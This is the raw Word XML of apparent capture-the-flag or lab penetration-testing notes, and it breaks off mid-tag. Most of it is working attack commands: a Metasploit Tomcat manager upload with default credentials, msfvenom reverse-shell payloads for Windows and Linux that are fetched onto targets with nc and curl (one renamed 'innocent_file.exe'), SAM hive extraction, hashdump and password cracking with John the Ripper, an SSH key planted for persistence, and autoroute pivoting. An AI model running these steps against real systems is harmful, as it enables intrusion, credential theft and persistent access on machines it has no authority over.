    <w:p w14:paraId="2CE836C6" w14:textId="3368DC10" w:rsidR="00C378B1" w:rsidRDefault="00C378B1" w:rsidP="00C378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14:paraId="653455CF" w14:textId="3C9F7727" w:rsidR="00C378B1" w:rsidRDefault="000D65B3" w:rsidP="00C378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Went into Manager App -&gt; Hack the planet page -&gt; source code</w:t>
      </w:r>
      <w:r w:rsidR="00F733D6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Found flag!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAAF77F" w14:textId="56E0E473" w:rsidR="00F733D6" w:rsidRDefault="00F733D6" w:rsidP="00C378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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get reverse shell access to Windows server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA8F9A8" w14:textId="505A3E46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33D6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use exploit/multi/http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F733D6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tomcat_mgr_upload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="44942C8E" w14:textId="0A6D6752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set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HttpUsername</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212964B8" w14:textId="0F64560E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HttpPassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1746217E" w14:textId="75760952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RHOSTS 10.0.2.164</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C508553" w14:textId="3113EA75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RPORT 8282</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64165AFA" w14:textId="017F2DC0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PAYLOAD </w:t>
      </w:r>
      <w:r w:rsidRPr="00F733D6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>java/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F733D6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="070AC258" w14:textId="5629DC73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LHOST 192.168.0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFB1301" w14:textId="22813EAE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LPORT 1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534E6C9B" w14:textId="4A680262" w:rsidR="00F733D6" w:rsidRDefault="00F733D6" w:rsidP="00F733D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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133043AB" w14:textId="4B8561C0" w:rsidR="00F733D6" w:rsidRDefault="00006AEF" w:rsidP="00F733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Extracted SAM file into C:\ drive using </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5703CE20" w14:textId="1A5B36AE" w:rsidR="00006AEF" w:rsidRDefault="00006AEF" w:rsidP="00006AE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06AEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">reg save </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00006AEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hklm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00006AEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00006AEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00006AEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> c:\sam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384D5FD1" w14:textId="02A59C85" w:rsidR="00006AEF" w:rsidRDefault="00143994" w:rsidP="00006A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new Windows exe payload with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64A65AD9" w14:textId="790210A1" w:rsidR="00143994" w:rsidRDefault="00143994" w:rsidP="0014399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143994">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00143994">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00143994">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00143994">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00143994">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00143994">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=192.168.1.103 LPORT=4444 -f exe -o /home/kali/Desktop/rs_exploitl.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F44E141" w14:textId="1D68135A" w:rsidR="00143994" w:rsidRDefault="00143994" w:rsidP="001439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Uploaded this file to the Windows server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBB1992" w14:textId="3E7A46A7" w:rsidR="00143994" w:rsidRDefault="00143994" w:rsidP="001439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local machine: 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-l -p 1400 &lt; </w:t>
      </w:r>
      <w:r w:rsidR="00AE7CC4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>~/Desktop/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rs_exploitl.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB2CCB9" w14:textId="4F7B3E0A" w:rsidR="00143994" w:rsidRDefault="00143994" w:rsidP="001439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remote machine: curl 192.168.0.9:1400 </w:t>
      </w:r>
      <w:r w:rsidR="00AD3814">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>output C:\innocent_file.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7F6F76" w14:textId="034F248B" w:rsidR="00982CE3" w:rsidRDefault="00982CE3" w:rsidP="00982C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 exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E398B44" w14:textId="225B373F" w:rsidR="00982CE3" w:rsidRDefault="00982CE3" w:rsidP="0098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local: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6CE0604E" w14:textId="088AB67F" w:rsidR="00982CE3" w:rsidRDefault="006A7E21" w:rsidP="00982CE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2CE3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F7C37D" w14:textId="4C87CE13" w:rsidR="00982CE3" w:rsidRDefault="006A7E21" w:rsidP="00982CE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2CE3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134A5F8B" w14:textId="688C4D09" w:rsidR="00982CE3" w:rsidRDefault="006A7E21" w:rsidP="00BF7F6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2CE3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set LHOST 192.168.0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7308DA0C" w14:textId="3355E471" w:rsidR="00982CE3" w:rsidRDefault="006A7E21" w:rsidP="00982CE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2CE3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4C1632" w14:textId="5CC67E36" w:rsidR="00982CE3" w:rsidRDefault="00982CE3" w:rsidP="0098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remote: innocent_file.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E4D1FB" w14:textId="76A0007E" w:rsidR="008206EA" w:rsidRDefault="008206EA" w:rsidP="008206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access. Got hashes</w:t>
      </w:r>
      <w:r w:rsidR="00EB5914">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EB5914">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="733FE006" w14:textId="27CB4260" w:rsidR="006861C1" w:rsidRDefault="007C1649" w:rsidP="006861C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6861C1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3CC37549" w14:textId="145EC86A" w:rsidR="00EB5914" w:rsidRDefault="00826BE2" w:rsidP="00EB591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06EA" w:rsidRPr="008206EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>run post/windows/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008206EA" w:rsidRPr="008206EA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2A23A243" w14:textId="4DB4BD4C" w:rsidR="00F25434" w:rsidRDefault="00F25434" w:rsidP="00F254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 John the Ripper on hash file to retrieve passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CED943" w14:textId="49108037" w:rsidR="00F25434" w:rsidRDefault="00A13346" w:rsidP="00F2543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5434" w:rsidRPr="00F25434">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>john --format=NT --wordlist=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F25434" w:rsidRPr="00F25434">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F25434" w:rsidRPr="00F25434">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/share/wordlists/rockyou.txt windows_users.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F513A3" w14:textId="6E76AFAD" w:rsidR="00F25434" w:rsidRDefault="00F25434" w:rsidP="00F2543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B5EF5A0" wp14:editId="751BB00D">
            <wp:extent cx="5276850" cy="1345494"/>
            <wp:effectExtent l="0" t="0" r="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034" cy="13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7389" w14:textId="4C9BAFBD" w:rsidR="007B54CB" w:rsidRDefault="007B54CB" w:rsidP="007B54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my</w:t>
      </w:r>
      <w:r w:rsidR="0016576B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> key to </w:t>
      </w:r>
      <w:r w:rsidRPr="007B54CB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C:\Users\printer\.ssh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\authorized_keys using the method in 2.g.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2CEF7A" w14:textId="1FB45177" w:rsidR="004D03DA" w:rsidRDefault="0016576B" w:rsidP="004D03D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now </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016576B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016576B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="004D03DA" w:rsidRPr="00EB500E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>printer@10.0.2.164</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="621781F6" w14:textId="3428D20C" w:rsidR="007D7170" w:rsidRDefault="007D7170" w:rsidP="007D71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Wrote ipconfig, found server 10.37.146.164. Port 445 open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0886E5BC" w14:textId="4B2D8A9E" w:rsidR="007D7170" w:rsidRDefault="00E11084" w:rsidP="007D71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Finding pivot IPs and pivoting</w:t>
      </w:r>
      <w:r w:rsidR="0036395C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="0036395C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CHECK OUT SSH PORT FORWARDING!!!</w:t>
      </w:r>
      <w:r w:rsidR="0036395C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7622BABF" w14:textId="1D35E843" w:rsidR="00E2733A" w:rsidRDefault="00E2733A" w:rsidP="00E2733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(follow </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>h.i.</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636E2014" w14:textId="77777777" w:rsidR="001B5504" w:rsidRDefault="001B5504" w:rsidP="00E2733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381C176D" w14:textId="2BD34796" w:rsidR="00E2733A" w:rsidRDefault="001B5504" w:rsidP="001B55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note of IPV4 address that is not the same one as the target machine you’re in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5FD705" w14:textId="66B121ED" w:rsidR="001B5504" w:rsidRDefault="001B5504" w:rsidP="00E2733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autoroute -s 10.37.146.164</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346F790F" w14:textId="2B2E579D" w:rsidR="001B5504" w:rsidRDefault="001B5504" w:rsidP="001B55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the IP address by whatever one you find on step ii.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE3E95E" w14:textId="5785E2EC" w:rsidR="001B5504" w:rsidRDefault="001B5504" w:rsidP="001B55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autoroute -p to confirm this address has been added</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465F6E45" w14:textId="47599F88" w:rsidR="001B5504" w:rsidRDefault="001B5504" w:rsidP="001B550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B5504">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>run post/windows/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B5504">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>smart_hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="54ADE753" w14:textId="05D471EB" w:rsidR="00E11084" w:rsidRDefault="00E11084" w:rsidP="0036395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track of hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4223051C" w14:textId="61B5B7D8" w:rsidR="00DF0F7A" w:rsidRDefault="00DF0F7A" w:rsidP="00DF0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on all services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135ACCB6" w14:textId="5DDB3438" w:rsidR="00DF0F7A" w:rsidRDefault="00DF0F7A" w:rsidP="00DF0F7A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10.0.0.0/20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6F26E7" w14:textId="3282EAF8" w:rsidR="00DF0F7A" w:rsidRDefault="00DF0F7A" w:rsidP="00DF0F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Found telnet address 10.0.2.239</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637CFFB6" w14:textId="10837311" w:rsidR="006D340A" w:rsidRDefault="006D340A" w:rsidP="006D34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 telnet 10.0.2.239</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE2157D" w14:textId="059FEC8B" w:rsidR="006D340A" w:rsidRDefault="006D340A" w:rsidP="006D340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goldstein</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B88A5A4" w14:textId="687D08E7" w:rsidR="006D340A" w:rsidRDefault="006D340A" w:rsidP="006D340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password: Barragan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3BBC3F" w14:textId="72BABD7D" w:rsidR="006D340A" w:rsidRDefault="006D340A" w:rsidP="006D340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Got access to SSH system and found flag!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6634298D" w14:textId="7A9CBCC9" w:rsidR="006D340A" w:rsidRDefault="00420E31" w:rsidP="00420E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Injected reverse shell script on server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A501C63" w14:textId="7394E91E" w:rsidR="00420E31" w:rsidRDefault="00BE30CD" w:rsidP="00420E3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20E31" w:rsidRPr="00420E31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00420E31" w:rsidRPr="00420E31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00420E31" w:rsidRPr="00420E31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00420E31" w:rsidRPr="00420E31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/x86/shell/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00420E31" w:rsidRPr="00420E31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00420E31" w:rsidRPr="00420E31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=192.168.0.9 LPORT=1337 -f elf &gt; ~/Desktop/shell-x86.elf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63904D58" w14:textId="0E83BEA6" w:rsidR="00420E31" w:rsidRDefault="00BE30CD" w:rsidP="00420E3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0E31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">On host: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00420E31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00420E31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l -p 1400 &lt; ~/Desktop/shell-x86.elf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C957329" w14:textId="611A47DE" w:rsidR="00420E31" w:rsidRDefault="00420E31" w:rsidP="00420E3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remote: curl 192.168.0.9:1400 –output ~/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shell.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="48440536" w14:textId="71201853" w:rsidR="004C6776" w:rsidRDefault="004C6776" w:rsidP="00420E3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remote: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777 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shell.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="77520F7A" w14:textId="2F85E66F" w:rsidR="004C6776" w:rsidRDefault="004C6776" w:rsidP="00420E3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host: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3EE5FE53" w14:textId="65E538C5" w:rsidR="004C6776" w:rsidRDefault="00181A87" w:rsidP="004C677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6776">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A9CB62" w14:textId="25BFBCA7" w:rsidR="004C6776" w:rsidRDefault="00181A87" w:rsidP="004C677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6776">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">set PAYLOAD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004C6776" w:rsidRPr="00420E31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004C6776" w:rsidRPr="00420E31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/x86/shell/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004C6776" w:rsidRPr="00420E31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D681537" w14:textId="47B51966" w:rsidR="004C6776" w:rsidRDefault="00181A87" w:rsidP="004C677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6776">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set LHOST 192.168.0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7C895F" w14:textId="099C49E1" w:rsidR="004C6776" w:rsidRDefault="00181A87" w:rsidP="004C677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6776">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">set LPORT </w:t>
      </w:r>
      <w:r w:rsidR="00BE30CD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789438F3" w14:textId="4BCAFED3" w:rsidR="004C6776" w:rsidRDefault="00181A87" w:rsidP="004C677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6776">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE15F37" w14:textId="3010FD3A" w:rsidR="004C6776" w:rsidRDefault="004C6776" w:rsidP="004C67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remote: ./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shell.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="16CF6886" w14:textId="7E7DDD41" w:rsidR="00BC0672" w:rsidRDefault="00BC0672" w:rsidP="004C67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host:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9E0757" w14:textId="1CAD8DEA" w:rsidR="00BC0672" w:rsidRDefault="00BC0672" w:rsidP="00BC067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shell connects, Ctrl-Z to background it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492A01AE" w14:textId="4B84783B" w:rsidR="00BC0672" w:rsidRDefault="00BC0672" w:rsidP="00BC067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sessions -u [session id] to upgrade it into a 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session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204C3A6C" w14:textId="07CF040B" w:rsidR="00BC0672" w:rsidRDefault="00BC0672" w:rsidP="00BC067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C0672">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use post/multi/recon/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC0672">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>local_exploit_suggester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="775C7A9B" w14:textId="2BDAC502" w:rsidR="00BC0672" w:rsidRDefault="00BC0672" w:rsidP="00BC067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 SESSION [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session id]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D06B412" w14:textId="00A42B62" w:rsidR="00BC0672" w:rsidRDefault="00BC0672" w:rsidP="00BC067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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35211051" w14:textId="6EBC2AA4" w:rsidR="0083557A" w:rsidRDefault="0083557A" w:rsidP="008355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D2CF46F" wp14:editId="1CC939D4">
            <wp:extent cx="5943600" cy="850265"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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D15C" w14:textId="3D70AC49" w:rsidR="0083557A" w:rsidRDefault="0083557A" w:rsidP="0083557A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3557A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083557A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083557A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083557A">
